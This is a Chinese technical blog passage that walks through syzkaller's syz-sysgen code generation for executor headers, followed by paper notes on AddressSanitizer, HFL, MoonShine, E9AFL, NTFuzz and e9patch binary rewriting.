以上图所示，由于当前遍历的 SyscallAttrs 结构体（也就是变量 attrs）的值全为默认值0，因此取出来的 Attrs 数组中各元素也为 0:

该 for 循环会一次次的将遍历到的 syscall 对应的 SyscallData 添加进data.Calls，其中 newSyscallData 函数所生成的 SyscallData 结构体定义如下：

// sys/syz-sysgen/sysgen.go
type SyscallData struct {
    Name     string      // syzlang 中的调用名，例如 accept$inet
    CallName string      // 实际的 syscall 调用名，例如 accept
    NR       int32       // syscall 对应的调用号，例如 30
    NeedCall bool        // 一个用于后续的 syz-executor 源码生成的标志，后面会提到
    Attrs    []uint64    // 存放分析 syzlang 所生成的 SyscallAttrs 数据数组
}

待整个 for 循环完成后，generateExecutorSyscall 函数将会把上面所生成的 data.Calls 数组进行排序，并返回 data 变量。

4. writeExecutorSyscalls

作用：该函数将生成 syz-executor 所使用的 C 代码头文件。

通读一下代码可以很容易的发现，该函数将会尝试填充两个 C 代码模板，并将填充后的 C 代码输出至 executor/defs.h 和 executor/syscalls.h。

func writeExecutorSyscalls(data *ExecutorData) {
    osutil.MkdirAll(filepath.Join(*outDir, "executor"))
    sort.Slice(data.OSes, func(i, j int) bool {
        return data.OSes[i].GOOS < data.OSes[j].GOOS
    })
    buf := new(bytes.Buffer)
    if err := defsTempl.Execute(buf, data); err != nil {
        tool.Failf("failed to execute defs template: %v", err)
    }
    writeFile(filepath.Join(*outDir, "executor", "defs.h"), buf.Bytes())
    buf.Reset()
    if err := syscallsTempl.Execute(buf, data); err != nil {
        tool.Failf("failed to execute syscalls template: %v", err)
    }
    writeFile(filepath.Join(*outDir, "executor", "syscalls.h"), buf.Bytes())
}

其中，defsTempl 代码模板如下：

var defsTempl = template.Must(template.New("").Parse(`// AUTOGENERATED FILE

struct call_attrs_t { {{range $attr := $.CallAttrs}}
    uint64_t {{$attr}};{{end}}
};

struct call_props_t { {{range $attr := $.CallProps}}
    {{$attr.Type}} {{$attr.Name}};{{end}}
};

#define read_call_props_t(var, reader) { \{{range $attr := $.CallProps}}
    (var).{{$attr.Name}} = ({{$attr.Type}})(reader); \{{end}}
}

{{range $os := $.OSes}}
#if GOOS_{{$os.GOOS}}
#define GOOS "{{$os.GOOS}}"
{{range $arch := $os.Archs}}
#if GOARCH_{{$arch.GOARCH}}
#define GOARCH "{{.GOARCH}}"
#define SYZ_REVISION "{{.Revision}}"
#define SYZ_EXECUTOR_USES_FORK_SERVER {{.ForkServer}}
#define SYZ_EXECUTOR_USES_SHMEM {{.Shmem}}
#define SYZ_PAGE_SIZE {{.PageSize}}
#define SYZ_NUM_PAGES {{.NumPages}}
#define SYZ_DATA_OFFSET {{.DataOffset}}
#endif
{{end}}
#endif
{{end}}
`))

代码模板看上去有点难以理解，因为其中混杂着 C 宏定义与模板描述，因此不妨从 executor/defs.h 中直接看看生成好的代码：

// AUTOGENERATED FILE

struct call_attrs_t { 
    uint64_t disabled;
    uint64_t timeout;
    uint64_t prog_timeout;
    uint64_t ignore_return;
    uint64_t breaks_returns;
};

struct call_props_t { 
    int fail_nth;
};

#define read_call_props_t(var, reader) { \
    (var).fail_nth = (int)(reader); \
}


#if GOOS_akaros
#define GOOS "akaros"

#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "361c8bb8e04aa58189bcdd153dc08078d629c0b5"
#define SYZ_EXECUTOR_USES_FORK_SERVER 1
#define SYZ_EXECUTOR_USES_SHMEM 0
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif

#endif

    ...
        
#if GOOS_linux
#define GOOS "linux"
   ...
#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "e61403f96ca19fc071d8e9c946b2259a2804c68e"
#define SYZ_EXECUTOR_USES_FORK_SERVER 1
#define SYZ_EXECUTOR_USES_SHMEM 1
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif
    ...
#endif
    ...
        
#if GOOS_windows
#define GOOS "windows"

#if GOARCH_amd64
#define GOARCH "amd64"
#define SYZ_REVISION "8967babc353ed00daaa6992068d3044bad9d29fa"
#define SYZ_EXECUTOR_USES_FORK_SERVER 0
#define SYZ_EXECUTOR_USES_SHMEM 0
#define SYZ_PAGE_SIZE 4096
#define SYZ_NUM_PAGES 4096
#define SYZ_DATA_OFFSET 536870912
#endif

#endif

可以看到， syz-sysgen 会将把先前 generateExecutorSyscalls 函数中所生成的 ArchData 结构体数据，导出至 executor/defs.h 文件中，供后续编译 syz-executor 所使用。syz-sysgen 将所有OS所有架构所对应的 ArchData 数据全部导出至一个文件中，并使用宏定义来选择启用哪一部分的数据。

另一个代码模板 syscallsTempl 的内容如下：

// nolint: lll
var syscallsTempl = template.Must(template.New("").Parse(`// AUTOGENERATED FILE
// clang-format off
{{range $os := $.OSes}}
#if GOOS_{{$os.GOOS}}
{{range $arch := $os.Archs}}
#if GOARCH_{{$arch.GOARCH}}
const call_t syscalls[] = {
{{range $c := $arch.Calls}}    {"{{$c.Name}}", {{$c.NR}}{{if or $c.Attrs $c.NeedCall}}, { {{- range $attr := $c.Attrs}}{{$attr}}, {{end}}}{{end}}{{if $c.NeedCall}}, (syscall_t){{$c.CallName}}{{end}}},
{{end}}};
#endif
{{end}}
#endif
{{end}}
`))

乍看上去还是有点难懂，我们不妨看看 executor/syscalls.h 示例：

...
#if GOOS_linux
...
#if GOARCH_amd64
const call_t syscalls[] = {
    {"accept", 43},
    {"accept$alg", 43},
    {"accept$ax25", 43},
    {"accept$inet", 43},
    {"accept$inet6", 43},
    {"accept$netrom", 43},
    {"accept$nfc_llcp", 43},
    ....,
    {"bind", 49},
    {"bind$802154_dgram", 49},
    {"bind$802154_raw", 49},
    {"bind$alg", 49},
    {"bind$ax25", 49},
    {"bind$bt_hci", 49},
    {"bind$bt_l2cap", 49},
    ....
    {"prctl$PR_CAPBSET_DROP", 167, {0, 0, 0, 1, 1, }},
    {"prctl$PR_CAPBSET_READ", 167, {0, 0, 0, 1, 1, }},
    {"prctl$PR_CAP_AMBIENT", 167, {0, 0, 0, 1, 1, }},
    ....
}
#endif
...
#endif
...

可以看到，executor/syscalls.h 下会存放着各个 syzlang 中所声明的 syscall 名与 syscall调用号的映射关系，以及可能有的 SyscallData。同时，也是使用宏定义来控制使用哪个OS哪个Arch下的 syscalls 映射关系。

再贴一下 SyscallData 结构体定义：

type SyscallData struct {
    Name     string
    CallName string
    NR       int32
    NeedCall bool
    Attrs    []uint64
}

5. 小结

当执行完 syz-extractor 为每个 syslang 文件生成一个常量映射表 .const 文件后，syz-sysgen 便会利用常量映射表，来彻底的解析 syzlang 源码，获取到其中声明的类型信息与 syscall 参数依赖关系。

当这些信息全都收集完毕后，syz-sysgen 便会将这些数据全部序列化为 go 文件，以供后续 syz-fuzzer 所使用。除此之外，syz-sysgen 还会创建 executor/defs.h 和 executor/syscalls.h，将部分信息导出至 C 头文件，以供后续 syz-executor 编译使用。

简单地说，syz-sysgen 解析 syzlang 文件，并为 syz-fuzzer 和 syz-executor 的编译运行做准备。

调试用的 vscode launch.json 文件：

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "syzgenLaunch",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${fileDirname}",
            "env": {},
            "cwd": "/usr/class/syzkaller",
            "args": ["-src", "/usr/class/syzkaller", "-out", "/tmp"] 
        }
    ]
}

论文笔记随笔 - 1

2022-03-06T16:00:00.000Z

简介

这里存放阅读论文/读代码时所记录下的一些零碎笔记。

由于这部分活动在记录笔记时，出于时间与重要性考虑，只会记录下较为重要的一部分，不会完整记录，因此单篇笔记的篇幅不会太长。

原先是想着把这些随笔放到周报里去，但是这会打乱周报的排版，思来想去还是想单独立一篇文章出来。

一、Address Sanitizer LLVM 3.1

阅读 Address Sanitizer LLVM 3.1 最早期的源代码。

Asan 使用 8 字节映射至 1字节的粗粒度内存映射。每块虚拟内存都会对应一块 shadow memory。
8字节的粗粒度，是因为 malloc 返回地址会对齐8字节。
其中 shadow byte 上的值表示 origin memory 中前 n 个字节是可访问的。
Asan 会在 LLVM pass 过程的末尾，对所有的内存读写操作进行插桩，检查当前访问的内存地址所对应的 shadow byte 的值是否说明当前地址可访问。如果不可访问则直接abort。
对于溢出检测，asan 会在用户内存的左右两边分别加上一块大小固定的 redzone，其中 redzone 所对应的 shadow memory 将会被加毒。这样当访问到 redzone 时将触发 asan。
加毒（poison) 指的是将某块用户内存所对应的 shadow memory 标记为不可访问。
对于栈内存来说，它会先分配一块 原始栈大小 + (等待被 redzone 检测的变量个数 + 1) * redzone 大小的内存，然后修改那些目标变量的 alloc 指令的偏移量。（poisonStackInFunction 函数）
之后，将一些栈上的信息放入当前栈帧最左边的 redzone里。
在函数头部，插入给当前栈帧 redzone 加毒的操作；并在所有 ret 语句之前插入 redzone 解毒的操作。
对于当前函数，若当前函数执行了一些 noret 的函数（例如 exit、execve），则在执行这些 noret 函数之前，必须对其解毒，防止误报。处理 no ret call 是为了防止有不返回的函数调用导致调用后栈上的 poison 信息没有被处理。
但需要注意的是，asan 只会在全局变量的右边加 redzone。（insertGlobalRedzones 函数）
同时，虽然全局变量的 redzone 的添加操作是以插桩的形式加入程序中，但全局变量的加毒解毒操作是位于 runtime 中。
Asan 会 hook memcpy 等内存处理或字符串处理的 lib 函数，以达到更好的效果。（InitializeAsanInterceptors 函数）
asan 除了检测内存越界读写以外，它同样检测 UAF 和 use after return。
- UAF
  asan hook 掉了 malloc、free、realloc 等函数，创建了自己的内存管理机制，在分配内存时对内存解毒，在释放内存时加毒。
  对于动态分配的内存，一共有三种主要状态，分别是：可分配、检疫、已分配。当某个内存块被释放时，该内存块将会被设置为检疫状态，并放置到检疫队列中。等到检疫队列数量超过阈值后，再将其中的检疫内存放回可分配内存池中。这样做的目的是为了延长某块内存从被释放到被二次分配的过程，延长检测 UAF 的窗口期。
- use after return
  在替换栈帧上原始 alloc 为新 alloc 之前，asan 会先分配一块 fake stack, 然后在替换 alloc 指令时，将其地址替换为 fake stack。这样，带有 redzone 的局部变量就会 alloc 在 fake stack 上，而不是 origin stack。
  在当前函数结束时，fake stack 会被重新加毒，注意此时不会回收 fake stack。
  那么 fake stack 在什么时候被回收呢？在分配 fake stack时。分配时会同步检测 fake stack 的调用栈，遍历调用栈中的每个 fake stack，判断当前 fake stack 所对应的 real_stack 地址是否大于当前的运行时栈。如果大于则说明该 fake stack 已经没有用处了，因此将会被释放。
asan 第一版存在局限性，例如不会检测到结构体成员之间内存对齐的那一小部分内存的越界，以及不会检测这种越界到另一块用户可读写内存中的情况等等，不过总体上实现效果非常优秀。

这里感谢 sad 师傅分享的笔记。

二、HFL: Hybrid Fuzzing on the Linux Kernel

论文 HFL: Hybrid Fuzzing on the Linux Kernel 结合 fuzz 技术和符号执行技术，主要解决三个问题：

由 syscall 参数所决定的间接控制流改变，会使得符号执行效率低下。（主要是这种：
- random fuzz 无法高效处理那些函数指针表索引来自参数的情况。
- 符号执行技术用一个 symbol 来索引函数表可能会导致符号解引用，而且还需要符号探索整个值空间
解决方案：基于 kernel src 做了一个离线转换器，用于在编译时将间接控制流转换成直接控制流：
需要推断 syscall 调用序列和依赖关系，以便于控制和匹配内部系统状态，防止 fuzz 效率低效
解决方法：
1. 首先使用静态分析技术（占大头的应该是指针分析技术），在多个 syscall 中收集对相同内存位置进行读写的内存读写对 集合（candidates）。这种内存读写是分开的，即在一个 syscall 中 write，在另一个 syscall 中 read。
2. 之后在 runtime 中验证这些 candidates。因为静态分析会产生一些误报，因此需要在执行时检测某个内存读写对是否确实会访问相同的内存位置，如果是则说明遍历到的 candidate 是真正的依赖关系对。
  同时写操作的 syscall 一定在读操作的前面，因为只有先写才能读。
3. 使用符号执行技术，确定 syscall 参数之间的依赖关系。例如 syscall2 中的参数等于 syscall1 中的某个参数，具体的看下面工作流程图可得知。
工作流程如下：
推断用于调用 syscall 的嵌套参数类型。这里还是用的老一套方法，检测 copy_from_user 函数以检测 syscall 嵌套参数的情况。这个其实不用多说，一张图胜过千言万语。

除了上面这三个问题以外，hybrid fuzz 中 fuzz 和 symbolic excution 切换的时机也很关键，其 fuzzer 内部维持了一个频率表，用于统计每个分支的 true/false 评估数量。我个人对这个设计还挺感兴趣，但是源码存放的网站已经被关闭，找不到源码了。

三、MoonShine: Optimizing OS Fuzzer Seed

论文 MoonShine: Optimizing OS Fuzzer Seed。这篇论文主要说明如何从真实系统调用序列中提取 OS Fuzzer 种子（种子蒸馏），同时保留依赖关系。它给出了两个有意思的依赖关系定义：对于 syscall $C_i、C_j$ 来说，

显式依赖：若 $C_i$ 生成的值用做 $C_j$ 的参数输入时，则说明 $C_j$ 依赖 $C_i$ ，那么自然得先调用 $C_i$ 再调用 $C_j$。
隐式依赖：若 $C_i$ 在执行过程中会通过共享变量读写来影响 $C_j$ 的执行，则说明 $C_j$ 依赖 $C_i$ 的执行。

MoonShine 建立依赖关系的流程是这样的：

对于显式依赖来说，MoonShine 主要构建依赖关系图，通过调用序列，将 syscall 返回值和对应的 syscall 参数相连接，来确定显式依赖。
对于隐式依赖来说，MoonShine 主要通过分析一对 syscall 之中的读写依赖项来确定依赖关系。即，若 $C_i$ 读取的全局变量集合与 $C_j$ 写入的全局变量集合之间存在交集，则说明这两个 syscall 之间存在隐式依赖关系。但需要注意的是，受限于静态分析的精度，其隐式依赖关系可能会被高估或者低估。

需要注意的是
如果 $C_i$ 隐式依赖与 $C_j$，而 $C_j$ 显式依赖于 $C_k$，则可说明 $C_i$ 隐式依赖于 $C_k$
如果 $C_i$ 显式依赖与 $C_j$，而 $C_j$ 隐式依赖于 $C_k$，则可说明 $C_i$ 显式依赖于 $C_k$

算法伪代码如下所示，伪代码还是比较好理解的：

以下是整体的算法思路：

首先是根据 coverage 对 syscall 进行排序，优先处理 coverage 更高的 syscall。
之后遍历 syscall 序列，获取其隐式依赖和显式依赖，并将其添加进语料序列中。

四、Scalable Fuzzing of Program Binaries with E9AFL

阅读论文 Scalable Fuzzing of Program Binaries with E9AFL：

e9afl 是一个可对无符号二进制程序插桩实现覆盖率反馈的工具，插桩后的程序可以直接用于 AFL 中进行 fuzz。相对于其他针对纯二进制文件进行 fuzz 的方法，它的优势在于插桩后的 overhead 还能保证在较低水平，同时还保证较高的精度。

整个插桩过程主要分为三步：

设计待插入的 trampoline template。这个没啥好说的，基本和 AFL 插桩方式对齐：
运行时插入。这步主要做的是将 fork server 和共享内存初始化等操作注入进 binary 中，使得在执行 main 函数前就执行这些操作。
确定待插桩的指令位置集合。e9afl 自己实现了一个轻量级控制流分析，以查找所有可能的 jump targets，其中包括直接目标和间接目标。间接目标的检测是通过分析数据段上的跳转表和指向代码的指针所确定的。
有意思的是，虽然静态控制流分析可能会存在一些精度误差（jump targets 多分析或者少分析），但是这些误差对整个 fuzz 过程不会造成太大的影响。

需要注意的是，如果 e9afl 只是插桩 trampoline 但不对其进行任何优化的话，整个程序的执行速度将会非常的慢。虽然 forkserver 对二进制程序的启动速度进行优化，但 fork 出的子进程将会大量触发页错。这是因为这些子进程会经常执行到 trampoline，因此会触发到 trampoline 所在页的页错误。

页错误是制约 e9afl 性能影响的关键，因此需要对其进行优化。这里它提出了三种优化策略：

trampoline ordering
使用与 patch 指令所对应的顺序，来在内存上分配 trampoline 内存。
什么意思呢？个人认为是这样的，对于相同代码区域（假设函数级的代码区域），e9afl 尽可能地将这个函数中所会用到的 trampoline，全部集中分配到某个页面（或者某个集中内存页区域里）。换句话说，尽可能让 patch 点相邻的指令，其 trampoline 也相邻。
这背后的原理是：对于一个函数来说，这个函数中的 trampoline 大概率是会大半都被执行的，那么如果将这个函数中的 trampoline 全都集中到一起，当函数执行第一个 trampoline1 时触发页错（正常现象），则接下来函数继续执行下面的 trampoline2 时就不再触发页错了，因为 trampoline1 和 2 位于同一块内存区域。
instruction selection
由于上一步优化策略在某些时刻可能不会起作用，例如 patch 时用到了指令双关技术，导致能跳转的 trampoline 地址有限。这一步的优化策略将尝试在基本块中的其他位置进行插桩，而不只是局限在每个基本块的块首。e9afl 会搜索同一基本块中是否存在其它 size>=5byte 的指令，并对该指令进行插桩。
bad block elimination
如果上面两个步骤的优化都无法完成，则说明相应的 trampoline 大概率会触发 page fault 并降低 fuzz 速度。那么这一步的优化，就主要侧重于删除一些不必要的 trampoline 插桩。
例如，假设通过 BasicBlockA 的所有路径都会通过到 BasicBlockB，那么只需检测这两个块中的其中一个的覆盖信息即可，这属于路径微分问题。
注：e9afl 将那些无法应用上述两步优化的基本块，称作为 bad block；反之为 good block。
但在这里 e9afl 更侧重于消减掉 bad block 的插桩，其做法如下：
1. 初始时，按照以下规则为每个基本块打标签：
  1. 为每个 good blocks 初始时打上 unoptimized 标签
  2. 为每个可能是间接跳转目标的 bad blocks 初始时打上 unpotimized 标签
  3. 其他 bad blocks 初始时打上 optimized 标签
2. 接下来，尝试解决 path differentation problem。对于任意满足以下条件的 sub-paths $\sigma=$ :
  1. 这一对基本块是 unoptimized
  2. 之间的基本块全都是 optimized
  若对于相同的对来说，存在至少两个 sub-paths $\sigma_1、\sigma_2$，则说明违反了 path differentiation 属性，需要对其进行修补。
  修补方式是：贪心地将 $\sigma_1、\sigma_2$ 中 optimized 的基本块修改为 unpotimized，并一直递归这个过程，直到没有任何 sub-paths 违背了这个属性。

最后是 e9afl 的评估效果，可以看到测试效果还是相当不错的，同时 e9afl 也能处理规模较大的文件，例如 chrome：

五、NTFUZZ: Enabling Type-Aware Kernel Fuzzing on Windows with Static Binary Analysis

论文 NTFuzz 提出了一个比较有意思的做法：

通过静态分析技术，将 documented 的用户 API 函数参数类型信息，传播至 undocumented 的系统调用参数类型，以弥补这两者之中的信息鸿沟。

通常

fuzzer 很难在没有参数类型信息的情况下，很好的 fuzz 或触发 bug
undocumented 的系统调用通常会和 documented 的 API 函数相关联
尽管 API 函数最终会进行系统调用，但 API 函数级别的 fuzz 不大可能会触发到 bug。这应该是因为 API 函数会事先对参数做一些过滤操作。

以下是 NTFuzz 的架构图，其中主要分为静态分析和动态内核 fuzzer 两部分：

其中比较关键的是静态分析器中的 Modular Analyzer，以 Function 为一个基本的分析单位，其基本算法思路如下：

初始时，输入 CFG、调用图、API描述。之后对 callGraph 使用拓扑排序，自底向上的去遍历每个函数（即先分析 callee，再分析 caller）。这样做的目的是为了可以在分析调用图上层函数时，直接使用先前已分析好的下层函数 summaries，降低时间开销。每次执行 summarize 操作分析函数时，会记录下这个函数所调用的 syscall，以及其内存状态的变动情况。

但这种函数分析顺序无法处理递归调用和间接调用两种情况，因此 NTFuzz 只是简单的将其省略。除此之外，静态分析器还必须能够

跨函数追踪数据流。
追踪过程间的内存状态。例如可能某个内存位置在某个函数中被修改，然后用到了另一个函数中去，那么这种使用情况就必须能够追踪的到。

接下来我们来重点看看静态分析器的三个部分：

Front-end
前端主要做了几件事情：读入 API 描述；将二进制文件解析成基本的 IR 语句并生成 CFG。其中，API 描述主要靠 Windows SDK 来获取，其代码内部的结构化注释也能很好的为 NTFuzz 提供类型信息。除此之外，解析出的 IR 省略了很多与类型信息或内存状态变动无关的 opcode，只留下了几个较为重要的：
有意思的是，这之中省略了一元运算符和分支跳转等指令。这可能是因为一元运算符通常不涉及内存修改，而分支跳转信息也会保存在所建立的 CFG 边上。
为了减小静态分析的 callGraph 大小，NTFuzz 先从带有 sysenter 指令的 syscall stub 函数开始，自底向上分析一个个函数的caller，直到遇到第一个 documented 的 API 函数，这样分析出来的函数集合称为 S1。但需要注意的是只分析 S1 是不够用的，因为这里面并没有包含其它可能会被 S1 中函数所调用的修改内存状态函数，因此在分析出 S1 后，还需要从 S1 函数集合出发，分析那些所有会被 S1 中函数所调用到的函数集合 S2。这样处理后，S1 + S2 集合便是 NTFuzz 需要进行静态分析的目标函数集合。
Modular Analyzer
整篇文章中最重要的部分就在这一小节中。
这一部分将会对目标函数集合依次执行 summarize 操作。整体上，该阶段会用到流敏感静态分析技术，这也是为了更好的支持指针分析技术。正如先前所说，这一步会记录下每个函数传递给 syscall 的参数值（注意这个值是抽象的，并非绝对的值），以及在函数进入和退出前后其内存状态的改变情况。具体来说，这步分为两个部分：抽象域(abstract domain) 和抽象语义(abstract semantics)。
抽象域（Abstract Domain），个人认为是用于在为函数提取 summary 时，指定其中某些变量或值的范围。其定义的抽象域主要有以下几种：
乍一看有亿点点复杂（实际上刚接触确实比较复杂），需要一点一点的啃。
1. 集合 Z，表示的是整数集合。（就是高中数学的那个 Z 集合）
2. 集合 I，表示抽象的整数集合。先引入一下 symbol 的概念，symbol 表示每个函数参数所引入的一个新的符号。因为我们在静态分析阶段没法确定各个函数调用的参数具体是什么值，因此需要用个符号来代替，有点类似符号执行的思想。例如
  1
  2
  3
  4
  int func(int a ) {
  int b = a*3+1;
  return b;
  }
  此时在静态分析阶段，我们可以粗略的认为参数 a 的数值为一个 symbol $\alpha$，那么变量 b 的数值便是 $\alpha * 3 +1$。
  因此，我们可以使用 $a*symbol+b$ 的形式来表示一个符号整数。当 a 为 0 时，则表示一个具体整数；a 不为 0 时，则表示一个符号整数。
  比较有意思的是符号整数还并上了一个倒T和正T 集合后，才构成抽象整数集合 I。其中，
  - 倒T 表示的是没有实际分析意义的整数集合。
  - 正T 表示的是任意一个整数集合。
  这里给出了倒T和正T 与普通整数的相加操作：
  因为倒T集合中的元素没有实际分析意义，因此如果倒T集合与一个有分析意义的 i 相加，则保留 i。
  由于正T表示的是任意整数集合，因此任意整数集合与其他整数相加，则仍然为一个任意整数集合，即正T集合。
  个人猜测这种加法所保留的结果，会更偏向于保留更有意义的集合。其优先级排序大体为 $正T > i > 倒T$。
  接下来我们来简单看看两个符号整数相加的结果：
  可以看到，只有在一些非常限制的条件下，两个符号整数相加才能得到确定的结果，否则其结果集合将非常的大，用正T 集合来表示。
3. 集合 V，表示函数中某个值的抽象。我们可以使用三个集合来确定一个变量的属性，分别是抽象值集合（数值取哪些），抽象位置集合（该变量存到了哪里），以及抽象类型集合（这个值的类型可以是哪些）。对于某个特定的抽象值 V 来说，使用三元组表示，其可选的数值是 集合I的子集；可选的内存位置是集合L幂集的子集；可选的类型是集合T幂集的子集。
  因此对于整个抽象值集合V来说，V的集合范围便是 集合 I x 集合L幂集 x 集合T 幂集。
  注意，$2^T$ 表示集合 T 的幂集。
  内存位置用幂集子集来表示，是因为一个指针在静态分析时可能会指向多个内存位置；类型同理。
4. 集合L，表示抽象内存位置集合。抽象内存位置可能有以下几种：
  1. 全局变量区某个固定的位置，因此用 $Global(Z)$ 表示所有可能的全局变量集合
  2. 栈区某个固定位置，用二元组 (f, o) 表示函数 f 栈帧上相对偏移为 o 的位置，因此用 $Stack(function\space *\space Z)$ 表示所有可能的栈变量位置集合；堆区同理，不过堆区用的是 (a, o) 表示堆变量位置，表示地址 a 上相对偏移为 o 的位置。
    上面这些都表示的是静态分析中相对较为固定的内存位置。
  3. 除了上面几种以外，还有一种内存位置是需要考虑的：符号指针 s 和指针偏移量为 o 的内存位置，用 SymLoc(s, o) 来指定抽象内存位置。
5. 集合T，表示类型约束集合。对于一个变量来说，其类型，要么是一个确定的类型，要么就和 symbol 类型一样。注意这里是约束的集合，因此如果某个类型的约束集合为空，则表示可以为任何类型。
抽象语义（Abstract Semantics），个人认为是对 expr 或 stmt 具体干了什么做了一个描述。要理解这个得先把先前说的 IR 搬过来：
现在我们再来尝试理解对 expr 的 evaluation，一个一个来：
其中，$V$表示的是，在抽象状态 $S$ 下，给定一个 $expr$ ，返回其表示的 Abstract Value。
我们先看看什么是抽象状态 S：
我们可以很容易的知道，抽象状态 S 保存了寄存器->V 的映射关系，以及内存位置 L -> V 的映射关系，这样的一个二维元组。简单来说，一个 State 保存了所有关于值的东西，即所有寄存器对应的值和所有内存位置对应的值。
因此，我们用 S[0] 来表示状态 S 下寄存器的映射关系 R，S[1] 表示状态 S 下内存位置的映射关系 M。
- $V(reg)(S)$：这个公式是比较好理解的。对于状态S，若传入一个 reg，则会先获取状态 S 下的寄存器映射关系 R（即 S[0]），之后使用 reg 作为该映射关系的键，获取其值。
- $V([e])(S)$：对于状态S，若传入一个表达式 $e$，则返回 e 所对应的内存位置上的值。这个公式等号后面的内容要拆开看。首先，我们需要获取表达式 e 所对应的 Abstract Value，即 $V(e)(S)$。返回的 Abstract Value 是一个三元组，其第1个 field 为 Memory Location（下标从0开始），因此 $V(e)(S)[1]$表示表达式 e 所有的内存位置集合。最后便是尝试访问在状态 S 下，其 Abstract Value 的所有内存位置，即 $\bigcup {S[1][l] | l \in V(e)(S)[1]}$
- $V(i)(S)$ ：对于状态 S，获取整数表达式 $i$ 所对应的 Abstract Value。
  - 当 $i=0$ 时，我们无法区分 i 是整数 0 还是空指针 NULL，因此只能忽略其类型约束。
  - 当 $i \in DataSection$，则我们可以确定 i 是一个指向全局变量的指针值。因为 i 所指向的数值并非我们所关心的，因此用倒 T 表示。
  - 其他情况下则认为 i 是一个普通整型。
- $V(e_1*e_2)(S)$：对于状态 S，获取其二元操作后的值。有个特殊的点在于，对于操作数组元素时，被操作的数组元素的 Memory Location，会被设置为 Array Base Memory Location，而不是精确的数组元素位置。这是为了防止索引范围爆炸所导致的内存位置爆炸。
接下来我们再试着理解 Stmt 的 evaluation：
其中，$m[k \rightarrow v]$ 表示把 m 从映射 k 强更新为 v；箭头上打个 w 表示是弱更新。在了解完 expr 相关的表达式后，我们可以较为容易的理解 Put、Store 和 update 原语，因此不再赘述。而对于 Call 原语来说，由于调用的函数可能会产生副作用（例如修改内存等等），因此需要额外处理。
这里，将一个函数的副作用定义为一个二元组，这样的二元组可以保存 什么样的参数导致什么样的内存修改 的信息：
而 apply 操作所要做的事情，就是将 Side Effect 中的 Update Set，apply 进状态 S 中：
apply 原语中有个倒 L 符号，个人理解是，将某个函数对某个内存位置上的值，映射为另一个函数上另一个内存位置上的值。这么说有点拗口，举个简单的例子：caller 有个变量，位于 $STACK(caller, -0x40)$，而 callee 则会访问 $STACK(callee, -0x80)$（caller 的局部变量），虽然看上去两个函数使用了不同的内存位置，但本质上这两个都指向的是同一个内存位置，因此需要做一个映射代换，那么倒L符号起到的就是这个替换作用。
Type Inferrer
类型推断器将会使用上一步所生成出的 summary 进行类型推断。难点在于结构体类型和数组类型推断。
首先是结构体类型推断。对于位于堆上的结构体来说，Inferrer 可以通过分析堆块所对应的状态来得出；但对于位于栈上的结构体来说，由于不像堆块那样隐含着边界信息，因此其他 field 可能会被误认为是其他的局部变量，很难去区分开到底栈上结构体中有哪些 field：
NTFuzz 在这里提出了一种启发式策略：通过函数中的内存访问模式，来判断某个栈变量是否为结构体中的一部分。
通俗的说，若某个相邻栈变量在初始化后从未使用，则说明这个变量是栈结构体中的一部分，将会被传递给 syscall；若这样的变量连初始化操作也没有，则说明这样的变量将会被 syscall 初始化。
其次是数组类型推断。数据类型分为两部分：数组元素类型和数组大小。其中数组元素类型可以通过 documented API 来获取；而数组大小可以通过 SAL 注释或者 API 参数的 size 参数来获取，以及还可以通过观察内存分配模式来获取。
有相当一部分 API 中的参数包含了数组指针和数组大小两部分，因此可以通过分析这些 API 来获取大小。

《Binary Rewriting without Control Flow Recovery》论文笔记

2022-02-24T16:00:00.000Z

一、概述

二进制重写技术在很多场景下都有大用，例如修复、加固、插桩、打补丁、调试等等。而大部分二进制重写技术都依赖于从输入二进制中恢复控制流信息，这是因为这些二进制重写技术通常都涉及指令移动等等，这就必须调整其他跳转指令的相对跳转偏移，即修复跳转目标集。

但问题在于，从二进制文件中恢复控制流信息是相当困难的：

一种方法是依赖于特定的二进制元数据，例如调试符号来恢复重定位信息，但并非所有二进制都会包含这类元数据（strip）
另一种方法是使用静态二进制分析技术来恢复，但通常效果不佳，而且不能应用于大小较大的二进制文件。

因此大部分二进制重写技术都依赖于一组甚至多组假设，例如特定编译器、特定编程语言等等。这样一来这些二进制重写技术都存在着局限性，难以扩展，同时也没办法处理大型程序，比如 chrome。

这篇论文向我们展示了一种基于 x86_64 的二进制重写技术，称为 e9patch。其中，e9 表示的是 jmpq rel32 的 opcode：0xe9。这种二进制重写技术的优点在于控制流无关（control flow agnostic），即无需任何控制流信息的知识。其二进制重写方法保留了跳转目标集，无需控制流恢复。因此，这个工具相当的鲁棒，而且还可以 patch 诸如 chrome 等等大小大于 100MB 的二进制程序。

除了普通的二进制程序以外，e9patch 还可以为 shared objects 或 libraries 打补丁。

二、背景

控制流无关的二进制重写技术无需知道跳转目标集，它把每一条指令都当作潜在的跳转目标，并在控制流执行到该指令时，保留该指令的语义（注意，这里保留的是指令的语义，而不是原始指令）。即二进制中所有的指令满足以下三个条件中的任意一个:

原始指令的保留
替换为操作上等效的指令
替换为执行特定目的的指令，例如修复和插桩等等

以下是几种控制流无关的二进制重写技术，e9patch 将在这些技术的基础上进行扩展。

B0: int3 断点

这应该是原理最简单的技术。通过把特定指令 patch 成 int3 断点，当控制流执行到此处时便会触发 SIGTRAP，此时控制流被信号处理例程接管（在某些用途下甚至是调试器接管，例如 trapfuzz），这样一来要 patch 的工作便可以在信号处理例程中进行。

其缺点是：性能开销很大。中断和信号处理例程的切换，会涉及到用户-内核层上下文的切换，时间开销可能会上一个数量级。

B1: Jumps

这种方式会将目标指令替换成一条 jmpq rel32 指令，使得控制流在执行到此处时，跳转至 trampoline 里，之后在 trampoline 中执行 patch 的指令，并在需要时执行原先被 patch 的那条指令。这种方法的一个应用场景是 inline hook：

但这种方法同样存在着局限性。对于 jmpq rel32 指令来说，该指令的大小为 5 个字节。如果待 patch 的指令其指令大小大于等于5个字节，则直接将 jmpq 指令替换上去，此时这种重写技术还是控制流无关的。

